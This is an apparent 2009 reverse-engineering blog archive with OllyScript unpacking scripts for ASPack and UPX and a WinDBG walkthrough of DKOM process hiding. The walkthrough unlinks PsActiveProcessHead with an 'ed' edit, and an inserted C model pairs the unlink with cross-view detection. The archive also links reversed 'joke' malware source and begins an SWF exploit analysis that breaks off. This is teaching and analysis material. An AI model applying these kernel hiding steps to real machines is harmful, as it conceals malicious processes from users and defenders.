x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-30675764044954259402009-09-14T21:32:00.007+08:002009-09-14T21:48:07.958+08:00Ollyscript Tutorial - Unpack ASPack
ASPack is actually similar to UPX.<br /><br />Using PEiD: <span style="font-weight: bold;">ASPack 2.12 -> Alexey Solodovnikov</span><br /><br />The script<br />-----------<br /><br /><blockquote style="font-family:times new roman;">var hwBP <span style="color: rgb(51, 51, 255);"> // Local var for hwBP</span><br /><br />mov hwBP, esp <span style="color: rgb(51, 51, 255);">// Using esp trick</span><br /><br />bphws hwBP, "r" <span style="color: rgb(51, 51, 255);">// Set hardware breakpoint</span><br /><br />run <span style="color: rgb(51, 51, 255);">// Run</span><br /><br />rtr <span style="color: rgb(51, 51, 255);"> // Execute till return</span><br /><br />sto <span style="color: rgb(51, 51, 255);">// F8</span><br /><br />msg "OEP found"<br /><br />cmt eip, "&lt;&lt;&lt;&lt;&lt;oep&gt;&gt;&gt;&gt;&gt;"<br /><br />ret</blockquote><br /><span style="font-weight: bold;">Download</span>: <a href="http://www.4shared.com/file/132551325/ba05f36b/notepad.html">Notepad.exe packed with ASPack</a><br /><br />Signing off<br />~x9090<br />x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0tag:blogger.com,1999:blog-1022731470813881575.post-62310432069128560912009-09-10T08:53:00.014+08:002009-09-29T23:42:02.815+08:00[DOC] Understanding DKOM with WinDBG
Process hiding can be achieved by using a technique called<span style="font-style: italic;"> DKOM </span>(<span style="font-style: italic;">Direct Kernel Object Manipulation</span>). I started to discover this when I first read the book <span style="font-weight: bold;">Rootkits: Subverting the Windows Kernel.</span><br /><br /><br /><span style="font-weight: bold;font-size:130%;" >WinDBG</span><br /><br />Using Task Manager (<span style="font-weight: bold;">Ctrl + Alt + Del</span>) we see the list of processes:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix-qgi5wFlNuKSHawNPdUG1kNONPlbIdlDnp4IjTiAXp6w4gAIWqfgBJafH9UDZMJcUFFEgBIq_q8NYuFU1stltPHNKCIAw4eRIozq02OFET0nlLA5l3SsNmjDbvce8gBAl5Efic8ambQT/s1600-h/Before.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 193px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix-qgi5wFlNuKSHawNPdUG1kNONPlbIdlDnp4IjTiAXp6w4gAIWqfgBJafH9UDZMJcUFFEgBIq_q8NYuFU1stltPHNKCIAw4eRIozq02OFET0nlLA5l3SsNmjDbvce8gBAl5Efic8ambQT/s400/Before.jpg" alt="" id="BLOGGER_PHOTO_ID_5379641901453878898" border="0" /></a><br />We can find the chain of active processes by looking at <b>PsActiveProcessHead</b>, an undocumented global kernel variable that is not exported by the kernel.<br /><br /><b>PsActiveProcessHead</b> is the <b>LIST_ENTRY</b> head of the linked list of processes currently active in the kernel.<br /><br />The "<b>system</b>" process is always the <span style="font-weight: bold;">FIRST ENTRY</span>, and it can be found via the kernel API <a href="http://msdn.microsoft.com/en-us/library/bb314008.aspx"><b>PsInitialSystemProcess</b></a>, which returns a pointer to the <b>EPROCESS</b> structure of the "<b>system</b>" process. Its <b>EPROCESS.ActiveProcessLinks.Blink</b> is the <b>PsActiveProcessHead</b>. 
To verify that:<br /><br />Let's see the <b>EPROCESS </b>and <b>LIST_ENTRY</b> structure<br /><br /><span style="font-family:times new roman;">kd> dt _eprocess</span><br /><span style="font-family:times new roman;">ntdll!_EPROCESS</span><br /><br /><blockquote style="font-family:times new roman;"> <span style="color: rgb(255, 255, 51);">+0x000 Pcb : _KPROCESS</span><br /><span style="color: rgb(255, 255, 51);"> +0x06c ProcessLock : _EX_PUSH_LOCK</span><br /><span style="color: rgb(255, 255, 51);"> +0x070 CreateTime : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x078 ExitTime : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x080 RundownProtect : _EX_RUNDOWN_REF</span><br /><span style="color: rgb(255, 255, 51);"> +0x084 UniqueProcessId : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> </span><b style="color: rgb(255, 255, 51);">+0x088 ActiveProcessLinks : _LIST_ENTRY</b><br /><span style="color: rgb(255, 255, 51);"> +0x090 QuotaUsage : [3] Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x09c QuotaPeak : [3] Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0a8 CommitCharge : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0ac PeakVirtualSize : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0b0 VirtualSize : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x0b4 SessionProcessLinks : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x0bc DebugPort : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x0c0 ExceptionPort : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x0c4 ObjectTable : Ptr32 _HANDLE_TABLE</span><br /><span style="color: rgb(255, 255, 51);"> +0x0c8 Token : _EX_FAST_REF</span><br /><span style="color: rgb(255, 255, 51);"> +0x0cc WorkingSetLock : _FAST_MUTEX</span><br /><span style="color: rgb(255, 255, 51);"> +0x0ec WorkingSetPage : Uint4B</span><br /><span style="color: 
rgb(255, 255, 51);"> +0x0f0 AddressCreationLock : _FAST_MUTEX</span><br /><span style="color: rgb(255, 255, 51);"> +0x110 HyperSpaceLock : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x114 ForkInProgress : Ptr32 _ETHREAD</span><br /><span style="color: rgb(255, 255, 51);"> +0x118 HardwareTrigger : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x11c VadRoot : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x120 VadHint : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x124 CloneRoot : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x128 NumberOfPrivatePages : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x12c NumberOfLockedPages : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x130 Win32Process : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x134 Job : Ptr32 _EJOB</span><br /><span style="color: rgb(255, 255, 51);"> +0x138 SectionObject : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x13c SectionBaseAddress : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x140 QuotaBlock : Ptr32 _EPROCESS_QUOTA_BLOCK</span><br /><span style="color: rgb(255, 255, 51);"> +0x144 WorkingSetWatch : Ptr32 _PAGEFAULT_HISTORY</span><br /><span style="color: rgb(255, 255, 51);"> +0x148 Win32WindowStation : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x14c InheritedFromUniqueProcessId : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x150 LdtInformation : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x154 VadFreeHint : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x158 VdmObjects : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x15c DeviceMap : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x160 PhysicalVadList : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x168 PageDirectoryPte : 
_HARDWARE_PTE_X86</span><br /><span style="color: rgb(255, 255, 51);"> +0x168 Filler : Uint8B</span><br /><span style="color: rgb(255, 255, 51);"> +0x170 Session : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x174 ImageFileName : [16] UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x184 JobLinks : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x18c LockedPagesList : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x190 ThreadListHead : _LIST_ENTRY</span><br /><span style="color: rgb(255, 255, 51);"> +0x198 SecurityPort : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x19c PaeTop : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x1a0 ActiveThreads : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1a4 GrantedAccess : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1a8 DefaultHardErrorProcessing : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1ac LastThreadExitStatus : Int4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1b0 Peb : Ptr32 _PEB</span><br /><span style="color: rgb(255, 255, 51);"> +0x1b4 PrefetchTrace : _EX_FAST_REF</span><br /><span style="color: rgb(255, 255, 51);"> +0x1b8 ReadOperationCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1c0 WriteOperationCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1c8 OtherOperationCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1d0 ReadTransferCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1d8 WriteTransferCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1e0 OtherTransferCount : _LARGE_INTEGER</span><br /><span style="color: rgb(255, 255, 51);"> +0x1e8 CommitChargeLimit : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x1ec CommitChargePeak : Uint4B</span><br /><span style="color: rgb(255, 
255, 51);"> +0x1f0 AweInfo : Ptr32 Void</span><br /><span style="color: rgb(255, 255, 51);"> +0x1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO</span><br /><span style="color: rgb(255, 255, 51);"> +0x1f8 Vm : _MMSUPPORT</span><br /><span style="color: rgb(255, 255, 51);"> +0x238 LastFaultCount : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x23c ModifiedPageCount : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x240 NumberOfVads : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x244 JobStatus : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Flags : Uint4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 CreateReported : Pos 0, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 NoDebugInherit : Pos 1, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ProcessExiting : Pos 2, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ProcessDelete : Pos 3, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Wow64SplitPages : Pos 4, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 VmDeleted : Pos 5, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 OutswapEnabled : Pos 6, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Outswapped : Pos 7, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ForkFailed : Pos 8, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 HasPhysicalVad : Pos 9, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 AddressSpaceInitialized : Pos 10, 2 Bits</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 SetTimerResolution : Pos 12, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 BreakOnTermination : Pos 13, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 SessionCreationUnderway : Pos 14, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 WriteWatch : Pos 
15, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 ProcessInSession : Pos 16, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 OverrideAddressSpace : Pos 17, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 HasAddressSpace : Pos 18, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 LaunchPrefetched : Pos 19, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 InjectInpageErrors : Pos 20, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 VmTopDown : Pos 21, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused3 : Pos 22, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused4 : Pos 23, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 VdmAllowed : Pos 24, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused : Pos 25, 5 Bits</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused1 : Pos 30, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x248 Unused2 : Pos 31, 1 Bit</span><br /><span style="color: rgb(255, 255, 51);"> +0x24c ExitStatus : Int4B</span><br /><span style="color: rgb(255, 255, 51);"> +0x250 NextPageColor : Uint2B</span><br /><span style="color: rgb(255, 255, 51);"> +0x252 SubSystemMinorVersion : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x253 SubSystemMajorVersion : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x252 SubSystemVersion : Uint2B</span><br /><span style="color: rgb(255, 255, 51);"> +0x254 PriorityClass : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x255 WorkingSetAcquiredUnsafe : UChar</span><br /><span style="color: rgb(255, 255, 51);"> +0x258 Cookie : Uint4B</span><br /><br /><span style="color: rgb(255, 0, 0);font-family:Times New Roman;font-size:85%;" >You</span><span style="color: rgb(255, 0, 0);"> can also check the structure on this page: <a 
href="http://www.acc.umu.se/%7Ebosse/ntifs.h">http://www.acc.umu.se/~bosse/ntifs.h</a></span></blockquote><span style="font-family:times new roman;">kd> dt _list_entry</span><br /><span style="font-family:times new roman;">ntdll!_LIST_ENTRY<br /></span><blockquote style="font-family: times new roman; color: rgb(255, 255, 51);"><br />+0x000 Flink : Ptr32 _LIST_ENTRY<br />+0x004 Blink : Ptr32 _LIST_ENTRY</blockquote><br />We first start to verify <span style="font-weight: bold;">PsActiveProcessHead </span>by checking the linked list:<br /><br /><span style="font-family:times new roman;">kd> dl nt!psactiveprocesshead 100 2</span><br /><br /><b></b><blockquote style="font-family: times new roman; color: rgb(255, 255, 51);"><b>Addr Flink Blink</b><br /><br /><b>805627b8 </b>825c68b8 82499c68<br />825c68b8 821f2818 <b>805627b8</b><br />821f2818 8211b680 825c68b8<br />8211b680 8229fe28 821f2818<br />8229fe28 820bde28 8211b680<br />820bde28 8220fe28 8229fe28<br />8220fe28 82290910 820bde28<br />82290910 821c90a8 8220fe28<br />821c90a8 8223e3a0 82290910<br />8223e3a0 82102c98 821c90a8<br />82102c98 8216b3a0 8223e3a0<br />8216b3a0 820f8680 82102c98<br />820f8680 82176aa8 8216b3a0<br />82176aa8 821611b8 820f8680<br />821611b8 8221ce28 82176aa8<br />8221ce28 8218f5b0 821611b8<br />8218f5b0 822484e8 8221ce28<br />822484e8 82252aa8 8218f5b0<br />82252aa8 821fb258 822484e8<br />821fb258 82147770 82252aa8<br />82147770 821cfc40 821fb258<br />821cfc40 8218daa8 82147770<br />8218daa8 820f7538 821cfc40<br />820f7538 822153a0 8218daa8<br />822153a0 8211fe28 820f7538<br />8211fe28 825cb908 822153a0<br />825cb908 82128e28 8211fe28<br />82128e28 820f3510 825cb908<br />820f3510 8210ce28 82128e28<br />8210ce28 820fd7c8 820f3510<br />820fd7c8 82234630 8210ce28<br />82234630 821da510 820fd7c8<br />821da510 821a9658 82234630<br />821a9658 82143c40 821da510<br />82143c40 822a80a8 821a9658<br />822a80a8 8230b0a8 82143c40<br />8230b0a8 8231d2d8 822a80a8<br />8231d2d8 821f4b20 8230b0a8<br 
/>821f4b20 82499c68 8231d2d8<br />82499c68 805627b8 821f4b20<br /></blockquote><br /><br />We can then use the kernel API <a href="http://msdn.microsoft.com/en-us/library/bb314008.aspx"><b>PsInitialSystemProcess</b></a> to look up the address of <span style="font-weight: bold;">PsActiveProcessHead</span>, which should be <b>0x805627b8</b>:<br /><br /><span style="font-family:times new roman;">kd> dt _eprocess activeprocesslinks.blink poi(psinitialsystemprocess)</span><br /><span style="font-family:times new roman;">ntdll!_EPROCESS</span><br /><blockquote style="color: rgb(255, 255, 51);"><span style="font-family:times new roman;"> +0x088 ActiveProcessLinks : [ 0x821f2818 - 0x805627b8 ]</span><br /><span style="font-family:times new roman;"> +0x004 Blink : </span><b style="font-family: times new roman;">0x805627b8 </b><span style="font-family:times new roman;">_LIST_ENTRY [ </span><i style="font-family: times new roman;">0x825c68b8 </i><span style="font-family:times new roman;">- </span><i style="font-family: times new roman;">0x82499c68 </i><span style="font-family:times new roman;">]<br /></span></blockquote><br />This confirms that <b>0x805627b8</b> is the address of <b>PsActiveProcessHead</b>, the list head whose <b>ActiveProcessLinks</b> pair [<b>Flink & Blink</b>] is [<b>Flink=0x825c68b8, Blink=0x82499c68</b>]; its <b>Flink</b> leads to the "<b>system</b>" process. To verify that:<br /><br />We take the <b>Flink</b> address <i>0x825c68b8</i> and subtract 0x88 to get the <b>EPROCESS</b> structure of the "<b>system</b>" process (refer to "dt _eprocess" above: <b>ActiveProcessLinks</b> sits at offset 0x88 and its first field is <b>Flink</b>):<br /><br /><span style="font-family:times new roman;">kd> dt _eprocess 0x825c68b8-0x88</span><br /><span style="font-family:times new roman;">ntdll!_EPROCESS</span><br /><br /><blockquote style="color: rgb(255, 255, 51);"> +0x000 Pcb 
: _KPROCESS<br />+0x06c ProcessLock : _EX_PUSH_LOCK<br />+0x070 CreateTime : _LARGE_INTEGER 0x0<br />+0x078 ExitTime : _LARGE_INTEGER 0x0<br />+0x080 RundownProtect : _EX_RUNDOWN_REF<br /><b>+0x084 UniqueProcessId : 0x00000004<br />+0x088 ActiveProcessLinks : _LIST_ENTRY [ 0x821f2818 - 0x805627b8 ]</b><br />...<br /><b>+0x174 ImageFileName : [16] "System"<br /></b> ... </blockquote>The <span style="font-weight: bold;">ImageFileName</span> gives us the process name, "<span style="font-weight: bold;">system</span>", and the "<span style="font-weight: bold;">system</span>" process always has process id 4 (<span style="font-weight: bold;">UniqueProcessId: 0x00000004</span>).<br /><br /><br /><span style="font-weight: bold; font-style: italic; font-size:130%; font-family:arial;">Hiding Processes</span><br /><br />So we know that <b>[ 0x821f2818 - 0x805627b8 ]</b> is the start of the active process chain. To hide a process, its <b>EPROCESS</b> structure is unlinked from this chain. For simplicity, I'll "remove" the whole chain, which means hiding all the processes:<br /><br /><br /><span style="font-family:times new roman;">kd> ed 805627b8<br />805627b8 825c68b8<br />Input> 805627b8</span><br /><br />Use the <b>ed</b> command to edit the memory at <b>0x805627b8</b> (remember this is <span style="font-weight: bold;">PsActiveProcessHead</span>, and its list always starts with the "<span style="font-weight: bold;">system</span>" process); the debugger then waits for your input. 
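Before entering the value, it helps to see what that edit does to the list and how a defender catches it. The following C program is an added example, not code from the post or the book: on a user-mode model of EPROCESS and LIST_ENTRY it walks the chain the way dl does (the same CONTAINING_RECORD arithmetic as 0x825c68b8-0x88), unlinks one entry the way a DKOM rootkit would, repeats the post's edit of the head's Flink, and then runs the cross-view check that detects both: the list walk is compared against an independent view of the processes, for which the constructed process table stands in (on a real system that second view would be, for example, a scan of thread or handle objects). Process names, PIDs and the field layout of the model structure are constructed for the example and are not the real kernel offsets.

```c
#include <stddef.h>
#include <stdio.h>

/* User-mode model of the two kernel structures used in the post. The field
 * offsets are NOT the real ones (constructed); only the list mechanics are modelled. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

typedef struct _EPROCESS {
    unsigned long UniqueProcessId;
    LIST_ENTRY    ActiveProcessLinks;   /* linked into PsActiveProcessHead */
    char          ImageFileName[16];
} EPROCESS;

/* Same pointer arithmetic as "0x825c68b8 - 0x88" in the post */
#define CONTAINING_RECORD(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

/* Constructed process table. It doubles as the independent second view that
 * the cross-view detector compares the list walk against. */
#define NPROC 4
static EPROCESS g_procs[NPROC] = {
    {4,    {NULL, NULL}, "System"},
    {612,  {NULL, NULL}, "csrss.exe"},
    {1337, {NULL, NULL}, "hidden.exe"},    /* the one a rootkit would hide */
    {2048, {NULL, NULL}, "notepad.exe"},
};
static LIST_ENTRY PsActiveProcessHead;

/* Build the circular doubly linked list: head -> System -> ... -> head */
void build_active_list(void) {
    PsActiveProcessHead.Flink = PsActiveProcessHead.Blink = &PsActiveProcessHead;
    for (int i = 0; i < NPROC; i++) {
        LIST_ENTRY *e = &g_procs[i].ActiveProcessLinks;
        e->Flink = &PsActiveProcessHead;
        e->Blink = PsActiveProcessHead.Blink;
        PsActiveProcessHead.Blink->Flink = e;
        PsActiveProcessHead.Blink = e;
    }
}

/* Walk Flink from the head, like "dl nt!PsActiveProcessHead" or a process
 * enumeration does. Stores up to max PIDs in out (may be NULL); returns the count. */
int walk_active_list(unsigned long *out, int max) {
    int n = 0;
    for (LIST_ENTRY *e = PsActiveProcessHead.Flink; e != &PsActiveProcessHead; e = e->Flink) {
        EPROCESS *p = CONTAINING_RECORD(e, EPROCESS, ActiveProcessLinks);
        if (n < max) out[n] = p->UniqueProcessId;
        n++;
    }
    return n;
}

/* DKOM unlink of a single entry: the neighbours are pointed past it. The entry
 * keeps its own pointers, and the process itself keeps running. */
void dkom_unlink(EPROCESS *p) {
    LIST_ENTRY *e = &p->ActiveProcessLinks;
    e->Blink->Flink = e->Flink;
    e->Flink->Blink = e->Blink;
}

/* What the "ed 805627b8" edit in the post does: head.Flink points at the head
 * itself, so a walk sees no process at all. */
void head_points_to_itself(void) {
    PsActiveProcessHead.Flink = &PsActiveProcessHead;
}

/* Cross-view detection: any process known to the second view but missing from
 * the list walk has been unlinked. Returns its PID, or 0 if the views agree. */
unsigned long find_hidden_process(void) {
    unsigned long seen[NPROC];
    int n = walk_active_list(seen, NPROC);
    if (n > NPROC) n = NPROC;              /* seen[] only holds NPROC entries */
    for (int i = 0; i < NPROC; i++) {
        int found = 0;
        for (int j = 0; j < n && !found; j++)
            found = (seen[j] == g_procs[i].UniqueProcessId);
        if (!found) return g_procs[i].UniqueProcessId;
    }
    return 0;
}

/* Scenarios; each rebuilds the list first so they can run in any order */
int visible_count_clean(void)             { build_active_list(); return walk_active_list(NULL, 0); }
int visible_count_after_unlink(void)      { build_active_list(); dkom_unlink(&g_procs[2]); return walk_active_list(NULL, 0); }
unsigned long hidden_after_unlink(void)   { build_active_list(); dkom_unlink(&g_procs[2]); return find_hidden_process(); }
unsigned long hidden_after_head_edit(void){ build_active_list(); head_points_to_itself(); return find_hidden_process(); }

int main(void) {
    printf("clean list: %d visible, cross-view finds pid %lu\n", visible_count_clean(), find_hidden_process());
    printf("after unlink: %d visible, cross-view finds pid %lu\n", visible_count_after_unlink(), hidden_after_unlink());
    printf("after head edit: cross-view finds pid %lu\n", hidden_after_head_edit());
    return 0;
}
```

The unlinked process keeps running because the scheduler works with thread objects rather than with this list; that is exactly why a walk of PsActiveProcessHead on its own cannot be trusted and needs a second, independently collected view to compare against.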
So just enter <b>0x805627b8</b>, making the list head point back to itself.<br /><br />The result would be:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkNt3dBae7k4IkDe6h8X5bOlswDtqVSjIPvMl_ypSREoA7ZzyuDlDsmHdWm8gyFNt4fm6WNuC_AMHm2mQGs6gg2CHaYy6zT7VSUZIdEtYmYBVsaoJp_N_nWNygawqkIeNvChqZgjYSQGdw/s1600-h/After.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 195px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkNt3dBae7k4IkDe6h8X5bOlswDtqVSjIPvMl_ypSREoA7ZzyuDlDsmHdWm8gyFNt4fm6WNuC_AMHm2mQGs6gg2CHaYy6zT7VSUZIdEtYmYBVsaoJp_N_nWNygawqkIeNvChqZgjYSQGdw/s400/After.jpg" alt="" id="BLOGGER_PHOTO_ID_5379650843866723090" border="0" /></a><br /><br /><span style="font-weight: bold; font-size:130%; font-family:arial;">References:</span><br /><br /><span style="font-weight: bold; font-style: italic;">Rootkit: Subverting the Windows Kernel (Page 169) - Direct Kernel Object Manipulation</span><br /><a href="http://www.rootkit.com/vault/Opc0de/GetVarXP.pdf">http://www.rootkit.com/vault/Opc0de/GetVarXP.pdf</a> - <b>Finding Kernel Global Variables</b><br /><a href="http://www.xfocus.net/articles/200408/724.html">http://www.xfocus.net/articles/200408/724.html</a> - <b>Obtaining the Kernel Variables of a Windows System (获取Windows 系统的内核变量)</b><br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br 
/></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com1tag:blogger.com,1999:blog-1022731470813881575.post-22395014836109003012009-07-22T21:20:00.006+08:002009-07-22T21:51:11.751+08:00Ollyscript Tutorial - Unpack UPXThis is the simplest Ollyscript tutorial, demonstrating how to write an OllyDbg script.<br /><br /><span style="font-family:courier new;font-size:85%;">var hwdBP <span style="color: rgb(0, 0, 153);">// Local variable to store the hardware breakpoint address</span><br />var softBP <span style="color: rgb(0, 0, 153);">// Local variable to store the software breakpoint address</span><br />sti <span style="color: rgb(0, 0, 153);">// Step into (F7) one instruction</span><br />findop eip, #61# <span style="color: rgb(0, 0, 153);">// Find the next POPAD (opcode 61h) from EIP</span><br />mov hwdBP, $RESULT <span style="color: rgb(0, 0, 153);">// Store $RESULT (the address of the POPAD) in the hardware breakpoint variable</span><br />bphws hwdBP, "x" <span style="color: rgb(0, 0, 153);">// Set a hardware breakpoint (execute) on the POPAD</span><br />run <span style="color: rgb(0, 0, 153);">// Run (F9) until the POPAD is hit</span><br />findop eip, #E9????????# <span style="color: rgb(0, 0, 153);">// Find the next JMP rel32 (E9 xx xx xx xx)</span><br />mov softBP, $RESULT <span style="color: rgb(0, 0, 153);">// Store $RESULT in the software breakpoint variable</span><br />bp softBP <span style="color: rgb(0, 0, 153);">// Set a software breakpoint on that JMP</span><br />run <span style="color: rgb(0, 0, 153);">// Run to the JMP instruction</span><br />sti <span style="color: rgb(0, 0, 153);">// Step into the JMP: EIP is now the OEP</span><br />cmt eip, "&lt;&lt;&lt;oep&gt;&gt;&gt;"<br />msg "OEP found, you can dump the file starting from this address"<br />ret</span><br /><br /><span style="font-weight: bold;">Downloads</span>:<br /><br /><a href="http://www.4shared.com/file/119824919/ec4b052e/Olly_Script_Editor_v20.html">Ollyscript Editor V2.0</a><br /><a href="http://www.4shared.com/file/119824779/b08f8fa2/OllyScript-094.html">Ollyscript Plugin V0.94 - <span style="font-style: italic;">ORIGINAL_README.txt - List of Ollyscript Commands by SHaG</span></a><br /><a href="http://www.4shared.com/file/119823896/2838c039/ARTeam_eZine_Number2.html">ARTeam_eZine_Number2.rar - <span style="font-style: italic;">Page 36 - Writing OllyDbg Scripts, Buzifer of Team RESURRECTiON from ARTeam</span><br /></a><br />Signing off<br />~x9090<br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br 
/></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com3tag:blogger.com,1999:blog-1022731470813881575.post-18779070161565274972009-07-21T18:16:00.006+08:002009-07-21T19:05:15.224+08:00Joke?Malware?I found an interesting piece of malware, though strictly speaking it is not really malware: it plays a joke on the machine and does not lead to any harmful activity.<br /><br />This is the latest scan result from <a href="http://virscan.org/report/a4eabb31bb54ad36928f28f7996d6ee8.html">Virscan</a>.<br /><br /><div style="text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dx1JY3MaCgN2BVkbXqH9ddh3HBu80PFYpheOfwicyC4hgMfW9DefpqmLUcXAgAMQYWXgW8h-eDKtmTOmY6oZw' class='b-hbp-video b-uploaded' frameborder='0'></iframe><br /></div><br />I managed to reverse it and produce the source code. The source code is attached.<br /><br />Attachment: <a href="http://www.4shared.com/file/119545558/7d5888c3/Joke.html">Joke.c</a><br /><br />Have fun! ;)<br /><br />Signing off<br />~x9090<br />
x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com1tag:blogger.com,1999:blog-1022731470813881575.post-28196617727240578522009-05-30T12:46:00.037+08:002009-06-06T11:24:43.794+08:00SWF Exploit Analysis - Part 2<span style="font-weight: bold;">Overview</span><br /><br />After obtaining the shellcode from the exploited SWF in the previous <a href="http://x9090.blogspot.com/2009/05/swf-exploit-analysis-part-1.html">post</a>, we can work out its payload (what the malware actually does). Before that, we have to deobfuscate the shellcode; otherwise it is impossible to continue the behavioural analysis of the malware.<br /><br /><br /><span style="font-weight: bold;">Analysis of shellcode</span><br /><br />Again, this is the file extracted from the exploit:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 